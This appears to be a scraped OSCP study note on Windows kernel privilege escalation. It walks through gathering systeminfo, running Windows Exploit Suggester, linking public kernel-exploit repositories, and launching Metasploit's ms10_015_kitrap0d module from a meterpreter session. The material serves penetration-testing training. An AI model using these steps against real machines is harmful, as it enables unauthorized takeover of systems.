// notes/ PrivEsc — Windows
🪟
Kernel Exploits
The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Ke…
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/kernel-exploits ↗Kernel Exploits
Overview
The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Kernel (system/core) we become the Kernel >:)
Kernel Version Example
powerquery
01OS Version: 6.1.7600 N/A Build 7600Kernel Exploits via Windows Exploit Suggester
Pull System Information from machine
code
01systeminfoStick into a sysinfo.txt file then update and feed it to Windows Exploit Suggester
bash
$python2.7 windows-exploit-suggester.py -uabap
01python2.7 windows-exploit-suggester.py -i sysinfo.txt -d 2024-03-02-mssb.xlsSearch for the exploits after receiving the results
{% embed url="https://github.com/SecWiki/windows-kernel-exploits" %}
{% embed url="https://github.com/abatchy17/WindowsExploits" %}
Kernel Exploits via Metasploit
Inside of an existing meterpreter shell
bash
$run post/multi/recon/local_exploit_suggesterChoose an exploit based on the ones listed
bash
$background$exploit/windows/local/ms10_015_kitrap0d$set session 1 $set lhost tun0$set lport 5555 (something different from last session)$exploit